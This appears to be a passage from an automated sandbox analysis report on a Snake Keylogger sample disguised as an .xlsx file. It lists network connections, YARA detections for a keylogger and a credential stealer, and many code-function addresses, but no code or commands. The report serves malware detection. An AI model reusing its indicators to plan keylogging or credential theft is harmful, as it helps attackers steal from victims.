Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49836 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: xSjByRHuwGV.exe PID: 1936, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: xSjByRHuwGV.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_02F84204	0_2_02F84204
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_02F87018	0_2_02F87018
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_02F8D8EC	0_2_02F8D8EC
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_05636C78	0_2_05636C78
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_056302C8	0_2_056302C8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_056302D8	0_2_056302D8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_05636C68	0_2_05636C68
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0563EFDF	0_2_0563EFDF
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0563F008	0_2_0563F008
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0563F018	0_2_0563F018
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_07A80E48	0_2_07A80E48
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_07A80E38	0_2_07A80E38
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_07A86448	0_2_07A86448
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_09166020	0_2_09166020
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0916EA68	0_2_0916EA68
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0916CDF0	0_2_0916CDF0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_09163F48	0_2_09163F48
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_09163F70	0_2_09163F70
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_09165180	0_2_09165180
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0916600F	0_2_0916600F
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0916F390	0_2_0916F390
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0916D228	0_2_0916D228
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0916E630	0_2_0916E630
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_008CB4A0	3_2_008CB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_008CB490	3_2_008CB490
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2D281	10_2_02E2D281
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2C146	10_2_02E2C146
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2C738	10_2_02E2C738
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2C475	10_2_02E2C475
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2CA11	10_2_02E2CA11
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E269A9	10_2_02E269A9
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2E988	10_2_02E2E988
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E23E09	10_2_02E23E09
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E26FC8	10_2_02E26FC8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2CFA9	10_2_02E2CFA9
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2CCE1	10_2_02E2CCE1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E25371	10_2_02E25371
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2F631	10_2_02E2F631
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2FA88	10_2_02E2FA88
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_02E2E981	10_2_02E2E981
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554E6B0	10_2_0554E6B0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554D550	10_2_0554D550
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554D540	10_2_0554D540
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05549548	10_2_05549548
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554DDFF	10_2_0554DDFF
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554FC58	10_2_0554FC58
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554FC68	10_2_0554FC68
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05549C18	10_2_05549C18
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554CC8F	10_2_0554CC8F
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554CCA0	10_2_0554CCA0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554EF51	10_2_0554EF51
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554EF60	10_2_0554EF60
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554178F	10_2_0554178F
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_055417A0	10_2_055417A0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05541E70	10_2_05541E70
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554DE00	10_2_0554DE00
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05541E80	10_2_05541E80
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554E6AF	10_2_0554E6AF
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554295A	10_2_0554295A
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05542968	10_2_05542968
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554D999	10_2_0554D999
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554D9A8	10_2_0554D9A8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05540040	10_2_05540040
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554F810	10_2_0554F810
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05545018	10_2_05545018
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554F802	10_2_0554F802
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05545028	10_2_05545028
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554D0F8	10_2_0554D0F8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554EB08	10_2_0554EB08
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05540B30	10_2_05540B30
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05540B20	10_2_05540B20
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05549328	10_2_05549328
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05548B90	10_2_05548B90
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554F3B8	10_2_0554F3B8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_05548BA0	10_2_05548BA0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554F3A8	10_2_0554F3A8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554E258	10_2_0554E258
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554E24A	10_2_0554E24A
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 10_2_0554EAF8	10_2_0554EAF8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_031B4204	11_2_031B4204
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_031B7018	11_2_031B7018
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_031BD8EC	11_2_031BD8EC
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_058C6C78	11_2_058C6C78
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_058C02C8	11_2_058C02C8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_058C02D8	11_2_058C02D8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_058C6C68	11_2_058C6C68
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_058CF008	11_2_058CF008
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_058CF018	11_2_058CF018
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F16020	11_2_08F16020
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F1EA68	11_2_08F1EA68
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F1CDF0	11_2_08F1CDF0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F13F70	11_2_08F13F70
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F13F48	11_2_08F13F48
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F1600F	11_2_08F1600F
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F15180	11_2_08F15180
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F1D228	11_2_08F1D228
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F1F390	11_2_08F1F390
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 11_2_08F1E630	11_2_08F1E630
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FED278	15_2_02FED278
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE5362	15_2_02FE5362
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEA088	15_2_02FEA088
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEC147	15_2_02FEC147
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE7118	15_2_02FE7118
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEC738	15_2_02FEC738
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEC468	15_2_02FEC468
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FECA08	15_2_02FECA08
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE69A0	15_2_02FE69A0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEE988	15_2_02FEE988
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FECFAA	15_2_02FECFAA
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FECCD8	15_2_02FECCD8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEF631	15_2_02FEF631
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE3AA1	15_2_02FE3AA1
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEFA88	15_2_02FEFA88
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE29EC	15_2_02FE29EC
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE39ED	15_2_02FE39ED
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FEE97A	15_2_02FEE97A
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_02FE3E09	15_2_02FE3E09
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D11E80	15_2_06D11E80
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D117A0	15_2_06D117A0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D19C70	15_2_06D19C70
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D19548	15_2_06D19548
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1F3B8	15_2_06D1F3B8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D10B30	15_2_06D10B30
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D15028	15_2_06D15028
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D12968	15_2_06D12968
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1E6B0	15_2_06D1E6B0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1E6A0	15_2_06D1E6A0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D11E70	15_2_06D11E70
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1DE00	15_2_06D1DE00
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1178F	15_2_06D1178F
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1EF51	15_2_06D1EF51
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1EF60	15_2_06D1EF60
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1CCA0	15_2_06D1CCA0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1FC5E	15_2_06D1FC5E
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1FC68	15_2_06D1FC68
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D19C6D	15_2_06D19C6D
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1DDF1	15_2_06D1DDF1
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1D550	15_2_06D1D550
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1D540	15_2_06D1D540
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1EAF8	15_2_06D1EAF8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1E258	15_2_06D1E258
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D1E249	15_2_06D1E249
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 15_2_06D18B90	15_2_06D18B90
